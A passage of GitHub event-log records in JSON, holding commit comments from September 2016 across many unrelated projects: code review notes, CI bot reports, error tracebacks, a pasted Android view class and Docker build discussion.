{"id":"4501902211","type":"CommitCommentEvent","actor":{"login":"rmeissn"},"repo":{"name":"slidewiki/slidewiki-platform"},"payload":{"comment":{"id":18862045,"position":6,"line":5,"path":"docker-compose_master.yml","commit_id":"ea1518021727baf21a62f4d22d28e9a095b12e54","created_at":"2016-09-01T11:06:15Z","updated_at":"2016-09-01T11:06:15Z","body":"it's still \"manfredfris....\" in this file"}},"created_at":"2016-09-01T11:06:15Z"}
{"id":"4501904826","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18862053,"position":null,"line":null,"path":null,"commit_id":"e7c24d1778bec73438090b8c1780f541c1a82d0e","created_at":"2016-09-01T11:06:54Z","updated_at":"2016-09-01T11:06:54Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/345/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T11:06:54Z"}
{"id":"4501911717","type":"CommitCommentEvent","actor":{"login":"jj0hns0n"},"repo":{"name":"GeoNode/geonode"},"payload":{"comment":{"id":18862071,"position":null,"line":null,"path":null,"commit_id":"5e4e5d65e7ab43c02ba96a529b54df794deef80c","created_at":"2016-09-01T11:08:36Z","updated_at":"2016-09-01T11:08:36Z","body":"Ok, Ill try this. @ingenieroariel can you push up to the dockerhub?\n"}},"created_at":"2016-09-01T11:08:36Z"}
{"id":"4501912779","type":"CommitCommentEvent","actor":{"login":"Torkilws"},"repo":{"name":"DFSM3101H16/august"},"payload":{"comment":{"id":18862076,"position":19,"line":41,"path":"2D phys testing/Assets/charPhys.cs","commit_id":"d64d6cb227d130e19cf60e70d060a4bf16c98dd1","created_at":"2016-09-01T11:08:51Z","updated_at":"2016-09-01T11:08:51Z","body":"LOL Noob"}},"created_at":"2016-09-01T11:08:51Z"}
{"id":"4501914047","type":"CommitCommentEvent","actor":{"login":"silenceyixia"},"repo":{"name":"silenceyixia/remember"},"payload":{"comment":{"id":18862080,"position":2,"line":2,"path":"README.md","commit_id":"48224bb02b515fc6509d94e8ce3b860ba9ad1481","created_at":"2016-09-01T11:09:11Z","updated_at":"2016-09-01T11:09:11Z","body":"package csda.com.videoplayer;\r\n\r\nimport android.animation.ValueAnimator;\r\nimport android.content.Context;\r\nimport android.graphics.Bitmap;\r\nimport android.graphics.BitmapFactory;\r\nimport android.graphics.Canvas;\r\nimport android.graphics.Paint;\r\nimport android.graphics.Rect;\r\nimport android.util.AttributeSet;\r\nimport android.view.View;\r\nimport android.view.animation.LinearInterpolator;\r\n\r\n\r\n/**\r\n * Created by fxl on 2016/8/31.\r\n */\r\npublic class NiceLoadingView extends View {\r\n    private Context mContext;\r\n    private Paint mPaint;\r\n\r\n    private int widthSpecSize;\r\n    private int heightSpecSize;\r\n    private int radiusSmall = 38;\r\n    private int radiusBig = 76;\r\n    private int moveX;\r\n    private int XPoint;\r\n\r\n    private int mState = -1;//0失败 1成功 -1默认\r\n    private boolean mflag;\r\n\r\n    private ValueAnimator mValueAnimator;\r\n\r\n    public NiceLoadingView(Context context) {\r\n        this(context,null);\r\n    }\r\n\r\n    public NiceLoadingView(Context context, AttributeSet attrs) {\r\n        this(context, attrs,0);\r\n    }\r\n\r\n    public NiceLoadingView(Context context, AttributeSet attrs, int defStyleAttr) {\r\n        super(context, attrs, defStyleAttr);\r\n    }\r\n\r\n    @Override\r\n    protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {\r\n        super.onMeasure(widthMeasureSpec, heightMeasureSpec);\r\n        widthSpecSize = MeasureSpec.getSize(widthMeasureSpec);\r\n        heightSpecSize = MeasureSpec.getSize(heightMeasureSpec);\r\n    }\r\n\r\n    @Override\r\n    protected void onDraw(Canvas canvas) {\r\n        super.onDraw(canvas);\r\n        mPaint = new Paint();\r\n        mPaint.setColor(0xFFFFBC53);\r\n        mPaint.setAntiAlias(true);\r\n        mPaint.setDither(true);\r\n        if(Math.abs(moveX) > widthSpecSize * 5/4){\r\n            XPoint = (moveX < 0) ? XPoint = widthSpecSize*7/4 - Math.abs(moveX) : widthSpecSize - widthSpecSize*7/4 + Math.abs(moveX);\r\n            canvas.drawCircle(XPoint,heightSpecSize/2,radiusSmall,mPaint);\r\n        }\r\n        if(Math.abs(moveX) > widthSpecSize && Math.abs(moveX) < widthSpecSize*3/2){\r\n            XPoint = (moveX < 0) ? XPoint = widthSpecSize*3/2 - Math.abs(moveX) : widthSpecSize - widthSpecSize*3/2 + Math.abs(moveX);\r\n            canvas.drawCircle(XPoint,heightSpecSize/2,radiusSmall,mPaint);\r\n        }\r\n        if(Math.abs(moveX)>widthSpecSize*3/4&&Math.abs(moveX)<widthSpecSize*5/4){\r\n            XPoint = (moveX < 0) ? XPoint = widthSpecSize*5/4 - Math.abs(moveX) : widthSpecSize - widthSpecSize*5/4 + Math.abs(moveX);\r\n            canvas.drawCircle(XPoint,heightSpecSize/2,radiusSmall,mPaint);\r\n        }\r\n        if(Math.abs(moveX)>widthSpecSize/2&&Math.abs(moveX)<widthSpecSize){\r\n            XPoint = (moveX<0) ? XPoint = widthSpecSize - Math.abs(moveX):widthSpecSize - widthSpecSize+Math.abs(moveX);\r\n            canvas.drawCircle(XPoint,heightSpecSize/2,radiusSmall,mPaint);\r\n        }\r\n        if(Math.abs(moveX) > widthSpecSize/4&& Math.abs(moveX) <widthSpecSize*3/4){\r\n            XPoint = (moveX < 0) ? XPoint = widthSpecSize/2 - Math.abs(moveX) : widthSpecSize - widthSpecSize/2 +Math.abs(moveX);\r\n            canvas.drawCircle(XPoint,heightSpecSize/2,radiusSmall,mPaint);\r\n        }\r\n        if(Math.abs(moveX) > 0 && Math.abs(moveX) < widthSpecSize/2){\r\n            XPoint = (moveX < 0) ? XPoint = widthSpecSize/2 - Math.abs(moveX) : widthSpecSize - widthSpecSize/2 + Math.abs(moveX);\r\n            canvas.drawCircle(XPoint,heightSpecSize/2,radiusSmall,mPaint);\r\n        }\r\n        if(Math.abs(moveX) > 0 && Math.abs(moveX) < widthSpecSize*5/4){\r\n            radiusBig = 2*radiusSmall - radiusSmall*(Math.abs(moveX))/(widthSpecSize*5/4);\r\n            radiusBig = (radiusBig > radiusSmall) ? radiusBig : radiusSmall;\r\n            canvas.drawCircle(widthSpecSize/2,heightSpecSize/2,radiusBig,mPaint);\r\n        }\r\n        if(Math.abs(moveX) < 12 && mState >= 0){\r\n            if(mState == 0){\r\n                canvas.drawCircle(widthSpecSize/2,heightSpecSize/2,radiusBig,mPaint);\r\n                Bitmap bitmap = BitmapFactory.decodeResource(getContext().getResources(),R.mipmap.ic_launcher);\r\n                canvas.drawBitmap(bitmap,null,new Rect(widthSpecSize/2 - radiusBig,heightSpecSize/2 -radiusBig,widthSpecSize/2+radiusBig,heightSpecSize/2 + radiusBig),mPaint);\r\n            }\r\n            if(mState == 1){\r\n                canvas.drawCircle(widthSpecSize/2,heightSpecSize/2,radiusBig,mPaint);\r\n                Bitmap bitmap = BitmapFactory.decodeResource(getContext().getResources(),R.mipmap.ic_launcher);\r\n                canvas.drawBitmap(bitmap,null,new Rect(widthSpecSize/2 - radiusBig,heightSpecSize/2 -radiusBig,widthSpecSize/2+radiusBig,heightSpecSize/2 + radiusBig),mPaint);\r\n            }\r\n        }\r\n    }\r\n\r\n    public void start(){\r\n        if(mValueAnimator != null){\r\n            mValueAnimator.cancel();\r\n        }\r\n        moveX = widthSpecSize * (-9/4);\r\n        mState = -1;\r\n        mflag = true;\r\n        post(new Runnable() {\r\n            @Override\r\n            public void run() {\r\n                mValueAnimator = ValueAnimator.ofFloat(0f,1.0f);\r\n                mValueAnimator.setRepeatMode(ValueAnimator.RESTART);\r\n                mValueAnimator.setRepeatCount(ValueAnimator.INFINITE);\r\n                mValueAnimator.setInterpolator(new LinearInterpolator());\r\n                mValueAnimator.addUpdateListener(new ValueAnimator.AnimatorUpdateListener() {\r\n                    @Override\r\n                    public void onAnimationUpdate(ValueAnimator valueAnimator) {\r\n                        if(mState < 0){\r\n                            moveX = (moveX > widthSpecSize*7/4)?widthSpecSize*(-9/4):moveX+12;\r\n                        }else {\r\n                            if(moveX>0){\r\n                                moveX = (moveX>widthSpecSize*7/4)?widthSpecSize*(-9/4):moveX+12;\r\n                            }else if(moveX < 0 && mflag){\r\n                                moveX += 12;\r\n                                if(Math.abs(moveX)<12){\r\n                                    mflag = false;\r\n                                }\r\n                            }\r\n                        }\r\n                        postInvalidate();\r\n                    }\r\n                });\r\n                mValueAnimator.start();\r\n            }\r\n        });\r\n    }\r\n\r\n    public void onSuccess(){\r\n        mState = 1;\r\n    }\r\n\r\n    public void onFailed(){\r\n        mState = 0;\r\n    }\r\n}\r\n"}},"created_at":"2016-09-01T11:09:11Z"}
{"id":"4501915751","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18862082,"position":null,"line":null,"path":null,"commit_id":"0c3b1112afe3c9231db2498f913c9b2bcf90a5b4","created_at":"2016-09-01T11:09:32Z","updated_at":"2016-09-01T11:09:32Z","body":"See https://github.com/NixOS/nixpkgs/issues/17034.\r\n\r\nThe help function does not work without less.\r\n```\r\n$ nix-shell -p python --pure --run \"python -c 'import sys; help(sys)'\"\r\nsh: less: command not found\r\n```"}},"created_at":"2016-09-01T11:09:32Z"}
{"id":"4501917130","type":"CommitCommentEvent","actor":{"login":"magnesj"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18862087,"position":null,"line":null,"path":null,"commit_id":"0128baddff58ce3fc4eab843c4b00a21bfed0ce3","created_at":"2016-09-01T11:09:52Z","updated_at":"2016-09-01T11:09:52Z","body":"I have implemented a workaround for the issue detected on Linux, so please check out the latest commit."}},"created_at":"2016-09-01T11:09:52Z"}
{"id":"4501921124","type":"CommitCommentEvent","actor":{"login":"albertinsyd"},"repo":{"name":"salesforceidentity/IdentityTrail-Module3"},"payload":{"comment":{"id":18862101,"position":null,"line":null,"path":null,"commit_id":"93d84258256abc3021c070e2e39739d4311e28bb","created_at":"2016-09-01T11:10:47Z","updated_at":"2016-09-01T11:10:47Z","body":"Without this fix, I was getting the following error:\r\n\r\n> We can’t log you in because of the following error.\r\n> \r\n> ERROR_CREATING_USER: Language: bad value for restricted picklist field: en_AU"}},"created_at":"2016-09-01T11:10:47Z"}
{"id":"4501926291","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18862110,"position":50,"line":52,"path":"CHANGELOG.md","commit_id":"a80e0b07d200d790af3cb0cd3471042efab196b2","created_at":"2016-09-01T11:11:59Z","updated_at":"2016-09-01T11:11:59Z","body":"Is this generated from the Jira data? While I had to work a lot on this feature, it was contributed by another person and his name should be here too."}},"created_at":"2016-09-01T11:11:59Z"}
{"id":"4501926766","type":"CommitCommentEvent","actor":{"login":"afraca"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18862113,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T11:12:07Z","updated_at":"2016-09-01T11:12:07Z","body":"With this you broke the isValid method, making all session id's that are generated invalid, breaking all logins."}},"created_at":"2016-09-01T11:12:07Z"}
{"id":"4501929569","type":"CommitCommentEvent","actor":{"login":"andela-bmakinwa"},"repo":{"name":"andela-mkimani/checkpoint-1-music-library"},"payload":{"comment":{"id":18862123,"position":20,"line":72,"path":"lib/music_library_controller.rb","commit_id":"9d7125379dd4b5046e8bed401defc718d16fb09b","created_at":"2016-09-01T11:12:44Z","updated_at":"2016-09-01T11:12:44Z","body":"**Nitpick - Code Quality**\r\nWe can have the `return false` statement on it's own line."}},"created_at":"2016-09-01T11:12:44Z"}
{"id":"4501933932","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18862130,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T11:13:48Z","updated_at":"2016-09-01T11:13:48Z","body":"yes so i think that MAYBE only some parts are working\r\nhttp://cvh.libreelec.tv/Tvheadend/lekma_builds_ubuntu/tvh-debug.log.xz for log of playing vaapi and after that without"}},"created_at":"2016-09-01T11:13:48Z"}
{"id":"4501940319","type":"CommitCommentEvent","actor":{"login":"magopian"},"repo":{"name":"magopian/bmi-calculator-polyglot"},"payload":{"comment":{"id":18862145,"position":46,"line":118,"path":"elm/BMI.elm","commit_id":"c03c6da95286f690aa58660729fbfdd3dc23692e","created_at":"2016-09-01T11:15:24Z","updated_at":"2016-09-01T11:15:24Z","body":"This is <3"}},"created_at":"2016-09-01T11:15:24Z"}
{"id":"4501940631","type":"CommitCommentEvent","actor":{"login":"rmeissn"},"repo":{"name":"slidewiki/slidewiki-platform"},"payload":{"comment":{"id":18862147,"position":null,"line":null,"path":null,"commit_id":"ea1518021727baf21a62f4d22d28e9a095b12e54","created_at":"2016-09-01T11:15:29Z","updated_at":"2016-09-01T11:15:29Z","body":"Please pay attention to the comments at specific files/lines.\r\n\r\nThe file `travis_scripts/dockerhub.sh` seems to be a bit complicated. What do we need hashes for? Just tagging images by their corresponding status (like testing or latest) and optionally adding a date (like `...:testing-02-09-2016` (DD-MM-JJJJ or even simpler MM-JJ) would be also sufficient, right?!"}},"created_at":"2016-09-01T11:15:29Z"}
{"id":"4501941734","type":"CommitCommentEvent","actor":{"login":"sghribi"},"repo":{"name":"windoo/app"},"payload":{"comment":{"id":18862149,"position":null,"line":null,"path":null,"commit_id":"41935024d48b3edf666441fadce14f6b9a838c15","created_at":"2016-09-01T11:15:45Z","updated_at":"2016-09-01T11:15:45Z","body":"@florentdestremau : à quelle heure tu rends ça privé ? :smile: "}},"created_at":"2016-09-01T11:15:45Z"}
{"id":"4501944905","type":"CommitCommentEvent","actor":{"login":"rmeissn"},"repo":{"name":"slidewiki/slidewiki-platform"},"payload":{"comment":{"id":18862158,"position":14,"line":12,"path":"travis_scripts/dockerhub.sh","commit_id":"ea1518021727baf21a62f4d22d28e9a095b12e54","created_at":"2016-09-01T11:16:33Z","updated_at":"2016-09-01T11:16:33Z","body":"I think you searched for something similar than this, right?\r\n`docker build -t slidewiki/platform:sprint-latest -t slidewiki/platform:sprint-12 .`"}},"created_at":"2016-09-01T11:16:33Z"}
{"id":"4501946365","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18862181,"position":null,"line":null,"path":null,"commit_id":"b9176b9e113f9f3ca91dd5444c2e7094a42806b0","created_at":"2016-09-01T11:16:54Z","updated_at":"2016-09-01T11:16:54Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/346/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T11:16:54Z"}
{"id":"4501946368","type":"CommitCommentEvent","actor":{"login":"polaroi8d"},"repo":{"name":"ARMmbed/jerryscript"},"payload":{"comment":{"id":18862182,"position":null,"line":null,"path":null,"commit_id":"da6619977ecc319dd48675fee7a9dc3b985d1671","created_at":"2016-09-01T11:16:54Z","updated_at":"2016-09-01T11:16:54Z","body":"@matthewelse yes I saw after you pushed another commit, sorry :) "}},"created_at":"2016-09-01T11:16:54Z"}
{"id":"4501951912","type":"CommitCommentEvent","actor":{"login":"Yicwif"},"repo":{"name":"asiainfoLDP/datahub"},"payload":{"comment":{"id":18862193,"position":null,"line":null,"path":null,"commit_id":"e8ae5c782ddf62acd5307052f9e421e8b0a9cf52","created_at":"2016-09-01T11:18:15Z","updated_at":"2016-09-01T11:18:15Z","body":"ok,  fmt.Println(\"--chinese,-ch     Dataitem's Chinese name\")重复"}},"created_at":"2016-09-01T11:18:15Z"}
{"id":"4501958534","type":"CommitCommentEvent","actor":{"login":"bska"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18862205,"position":null,"line":null,"path":null,"commit_id":"0128baddff58ce3fc4eab843c4b00a21bfed0ce3","created_at":"2016-09-01T11:19:51Z","updated_at":"2016-09-01T11:19:51Z","body":"> I have implemented a workaround for the issue detected on Linux, so please check out the latest commit.\r\n\r\nThe work-around of commit 8098578 appears to behave in a manner consistent with what it says on the tin.  At least I am now able to load the case mentioned earlier.  Thank you so much for the quick response!"}},"created_at":"2016-09-01T11:19:51Z"}
{"id":"4501962921","type":"CommitCommentEvent","actor":{"login":"kevin-ta"},"repo":{"name":"BDE-ESIEE/mobile"},"payload":{"comment":{"id":18862211,"position":null,"line":null,"path":null,"commit_id":"42e4e62916c2c6b87bc5c5c0cece9033ebda57ae","created_at":"2016-09-01T11:20:51Z","updated_at":"2016-09-01T11:20:51Z","body":"Mais du coup, elle sort quand l'appli Zéphyr ?"}},"created_at":"2016-09-01T11:20:51Z"}
{"id":"4501965114","type":"CommitCommentEvent","actor":{"login":"Martin-Wegner"},"repo":{"name":"valor-software/ng2-bootstrap"},"payload":{"comment":{"id":18862214,"position":null,"line":null,"path":null,"commit_id":"7d3cbf93798514a65ba83d62767c49aae7056c96","created_at":"2016-09-01T11:21:20Z","updated_at":"2016-09-01T11:21:20Z","body":"should also be added tofeat-RC6 branch :)"}},"created_at":"2016-09-01T11:21:20Z"}
{"id":"4501966138","type":"CommitCommentEvent","actor":{"login":"tomkooij"},"repo":{"name":"Blosc/c-blosc"},"payload":{"comment":{"id":18862215,"position":null,"line":null,"path":null,"commit_id":"54abf15278270dbb80578ba5760069c0a27f913e","created_at":"2016-09-01T11:21:34Z","updated_at":"2016-09-01T11:21:34Z","body":"MSVC2008 does not fully support C99. I got:\r\n"}},"created_at":"2016-09-01T11:21:34Z"}
{"id":"4501969511","type":"CommitCommentEvent","actor":{"login":"bwulff"},"repo":{"name":"slidewiki/slidewiki-platform"},"payload":{"comment":{"id":18862220,"position":4,"line":16,"path":".travis.yml","commit_id":"ea1518021727baf21a62f4d22d28e9a095b12e54","created_at":"2016-09-01T11:22:26Z","updated_at":"2016-09-01T11:22:26Z","body":"cosmetics, later"}},"created_at":"2016-09-01T11:22:26Z"}
{"id":"4501971490","type":"CommitCommentEvent","actor":{"login":"bwulff"},"repo":{"name":"slidewiki/slidewiki-platform"},"payload":{"comment":{"id":18862221,"position":17,"line":27,"path":".travis.yml","commit_id":"ea1518021727baf21a62f4d22d28e9a095b12e54","created_at":"2016-09-01T11:22:55Z","updated_at":"2016-09-01T11:22:55Z","body":"cosmetics, later"}},"created_at":"2016-09-01T11:22:55Z"}
{"id":"4501972066","type":"CommitCommentEvent","actor":{"login":"bigpresh"},"repo":{"name":"bigpresh/Dancer-Plugin-Auth-Extensible"},"payload":{"comment":{"id":18862222,"position":43,"line":40,"path":"lib/Dancer/Plugin/Auth/Extensible/Provider/Base.pm","commit_id":"e21f71903f3ae6d819b4d9ba6b4aa21fcd0cbd97","created_at":"2016-09-01T11:23:03Z","updated_at":"2016-09-01T11:23:03Z","body":"Hmm, yeah, that looks like it would mostly work, except at a quick glance, it won't match the `{...}` that Crypt::SaltedHash uses."}},"created_at":"2016-09-01T11:23:03Z"}
{"id":"4501972915","type":"CommitCommentEvent","actor":{"login":"bwulff"},"repo":{"name":"slidewiki/slidewiki-platform"},"payload":{"comment":{"id":18862224,"position":6,"line":5,"path":"docker-compose_master.yml","commit_id":"ea1518021727baf21a62f4d22d28e9a095b12e54","created_at":"2016-09-01T11:23:16Z","updated_at":"2016-09-01T11:23:16Z","body":"yes, I want to add testing.slidewiki.org in the first step"}},"created_at":"2016-09-01T11:23:16Z"}
{"id":"4501974650","type":"CommitCommentEvent","actor":{"login":"subhankardas41"},"repo":{"name":"subhankardas41/test"},"payload":{"comment":{"id":18862233,"position":null,"line":null,"path":null,"commit_id":"254c52d3e2947cff952dc7624ef518d7a9ae9402","created_at":"2016-09-01T11:23:39Z","updated_at":"2016-09-01T11:23:39Z","body":"ok"}},"created_at":"2016-09-01T11:23:39Z"}
{"id":"4501976482","type":"CommitCommentEvent","actor":{"login":"bwulff"},"repo":{"name":"slidewiki/slidewiki-platform"},"payload":{"comment":{"id":18862240,"position":14,"line":12,"path":"travis_scripts/dockerhub.sh","commit_id":"ea1518021727baf21a62f4d22d28e9a095b12e54","created_at":"2016-09-01T11:24:08Z","updated_at":"2016-09-01T11:24:08Z","body":"I saw that it is possible but chose to implement it this way, was easier and has same result."}},"created_at":"2016-09-01T11:24:08Z"}
{"id":"4501985020","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"devenbansod/phpmyadmin"},"payload":{"comment":{"id":18862259,"position":null,"line":null,"path":null,"commit_id":"f2a901895f7eef969b7082292dec190fa055adcc","created_at":"2016-09-01T11:26:17Z","updated_at":"2016-09-01T11:26:17Z","body":"I think this is okay. When doing such change, I'd also change accessing token to use ```$_POST['token']``` to make it clear we're using this only for POST request.\r\n\r\nMaybe it would be better to perform all this code only on POST requests...."}},"created_at":"2016-09-01T11:26:17Z"}
{"id":"4501992145","type":"CommitCommentEvent","actor":{"login":"mcccs"},"repo":{"name":"mcccs/Wurst-Client-for-MC-1.9.X"},"payload":{"comment":{"id":18862273,"position":null,"line":null,"path":null,"commit_id":"dd8e8a21ad197bd0025045221405ba81e6cb3f0b","created_at":"2016-09-01T11:28:07Z","updated_at":"2016-09-01T11:28:07Z","body":"@Eyremba \r\n@ThisTestUser \r\nI found something interesting. Someone (the [incognito](https://www.incognto.xyz/index.php) client) stole Alexander's idea: Würstchen's ASM injection system."}},"created_at":"2016-09-01T11:28:07Z"}
{"id":"4501992613","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18862275,"position":null,"line":null,"path":null,"commit_id":"cc17595cad3e771bc36198e1a0f00ef9796f8464","created_at":"2016-09-01T11:28:13Z","updated_at":"2016-09-01T11:28:13Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/347/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T11:28:13Z"}
{"id":"4501995838","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18862281,"position":null,"line":null,"path":null,"commit_id":"0ea20b48feda40a17c49dfb4d41a0ea1c95729fe","created_at":"2016-09-01T11:29:00Z","updated_at":"2016-09-01T11:29:00Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32086/testReport/) for this commit**"}},"created_at":"2016-09-01T11:29:00Z"}
{"id":"4501997469","type":"CommitCommentEvent","actor":{"login":"pr0d1r2"},"repo":{"name":"pr0d1r2/kitchenplan-config"},"payload":{"comment":{"id":18862286,"position":12,"line":16,"path":"config/groups/work.yml","commit_id":"b0cc330eaac577d686142185276681cdceb4d1f2","created_at":"2016-09-01T11:29:24Z","updated_at":"2016-09-01T11:29:24Z","body":"old habits die hard :trollface: \r\n"}},"created_at":"2016-09-01T11:29:24Z"}
{"id":"4501999741","type":"CommitCommentEvent","actor":{"login":"FrancescAlted"},"repo":{"name":"Blosc/c-blosc"},"payload":{"comment":{"id":18862290,"position":null,"line":null,"path":null,"commit_id":"54abf15278270dbb80578ba5760069c0a27f913e","created_at":"2016-09-01T11:29:56Z","updated_at":"2016-09-01T11:29:56Z","body":"Thanks.  Just fixed in ef543dc."}},"created_at":"2016-09-01T11:29:56Z"}
{"id":"4502000417","type":"CommitCommentEvent","actor":{"login":"devbence"},"repo":{"name":"modoboa/modoboa-pfxadmin-migrate"},"payload":{"comment":{"id":18862292,"position":null,"line":null,"path":null,"commit_id":"0784ae3757ee9f6be56f15dc60874e992a911c14","created_at":"2016-09-01T11:30:07Z","updated_at":"2016-09-01T11:30:07Z","body":"Almost, there is an another one:\r\n\r\n> Traceback (most recent call last):\r\n>   File \"instance/manage.py\", line 10, in <module>\r\n>     execute_from_command_line(sys.argv)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/__init__.py\", line 367, in execute_from_command_line\r\n>     utility.execute()\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/__init__.py\", line 359, in execute\r\n>     self.fetch_command(subcommand).run_from_argv(self.argv)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/base.py\", line 305, in run_from_argv\r\n>     self.execute(*args, **cmd_options)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/base.py\", line 353, in execute\r\n>     self.check()\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/base.py\", line 385, in check\r\n>     include_deployment_checks=include_deployment_checks,\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/base.py\", line 372, in _run_checks\r\n>     return checks.run_checks(**kwargs)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/checks/registry.py\", line 81, in run_checks\r\n>     new_errors = check(app_configs=app_configs)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/checks/urls.py\", line 14, in check_url_config\r\n>     return check_resolver(resolver)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/checks/urls.py\", line 24, in check_resolver\r\n>     for pattern in resolver.url_patterns:\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/utils/functional.py\", line 35, in __get__\r\n>     res = instance.__dict__[self.name] = self.func(instance)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/urls/resolvers.py\", line 310, in url_patterns\r\n>     patterns = getattr(self.urlconf_module, \"urlpatterns\", self.urlconf_module)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/utils/functional.py\", line 35, in __get__\r\n>     res = instance.__dict__[self.name] = self.func(instance)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/urls/resolvers.py\", line 303, in urlconf_module\r\n>     return import_module(self.urlconf_name)\r\n>   File \"/usr/lib/python2.7/importlib/__init__.py\", line 37, in import_module\r\n>     __import__(name)\r\n>   File \"/srv/modoboa/instance/instance/urls.py\", line 1, in <module>\r\n>     from django.conf.urls import patterns, include, url\r\n> ImportError: cannot import name patterns"}},"created_at":"2016-09-01T11:30:07Z"}
{"id":"4502000574","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":18862293,"position":null,"line":null,"path":null,"commit_id":"c636ae206daca2b7354ef0cc60f01c7199f5291b","created_at":"2016-09-01T11:30:11Z","updated_at":"2016-09-01T11:30:11Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-112/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-01T11:30:11Z"}
{"id":"4502006954","type":"CommitCommentEvent","actor":{"login":"bwulff"},"repo":{"name":"slidewiki/slidewiki-platform"},"payload":{"comment":{"id":18862304,"position":null,"line":null,"path":null,"commit_id":"ea1518021727baf21a62f4d22d28e9a095b12e54","created_at":"2016-09-01T11:31:40Z","updated_at":"2016-09-01T11:31:40Z","body":"The hash of the built image is needed because the same image needs to be tagged (potentially) several times (e.g. slidewiki-platform :sprint-12 :latests-sprint). The implementation that is currently in the dockerhub script first builds the image, then tags it with all the tags given from command line and then pushes the image and tags. As you  mentioned above there is a way for adding several tags with one command line, but this would involve constructing the docker command, which would also involve a for loop. I found it simpler to use the current solution."}},"created_at":"2016-09-01T11:31:40Z"}
{"id":"4502008867","type":"CommitCommentEvent","actor":{"login":"ranglanimanish90"},"repo":{"name":"OfficeDev/Project-REST-Basic-Operations"},"payload":{"comment":{"id":18862308,"position":null,"line":null,"path":null,"commit_id":"022cc2156157ff41450086e1cf5f07b55d6f2a8e","created_at":"2016-09-01T11:32:10Z","updated_at":"2016-09-01T11:32:10Z","body":"Hi rpsenski, thanks for replying. As per your comment I have tried following code \r\n\r\nbody=\"{'customFieldDictionary':[{'Key':'Custom_4f211fb5b754e611810900155d40aa00','Value':'MRocks', 'ValueType':'Edm.String'}]}\";\r\n$.ajax({\r\n\r\n        url: \"<SiteURL>/_api/ProjectServer/Projects('4ca43b20-7e6f-e611-80cc-00155d402808')/Draft/UpdateCustomFields()\",\r\n        method: \"POST\",\r\n\t\tdata: JSON.stringify(body),\r\n        headers: { \"Accept\": \"application/json; odata=verbose\",\"Content-Type\": \"application/json; odata=verbose\", \"X-HTTP-Method\":\"MERGE\",\r\n\t\t\t\t\"X-RequestDigest\" : $(\"#__REQUESTDIGEST\").val(),\t\t\t\t\r\n\t\t},\r\n\t\t\r\n        success: function(data){\r\n\t\t\tdebugger;\r\n             $(data.d.results).each(function(iIndex){\r\n             \ttitle=this.Title;\r\n             });\r\n             \r\n        },\r\n        error: function(error){\r\n\t\t\tdebugger;\r\n            console.log(JSON.stringify(error));\r\n        }\r\n\r\n});\r\n\r\nbut it is giving following error\r\n{\"readyState\":4,\"responseText\":\"{\\\"error\\\":{\\\"code\\\":\\\"-1, 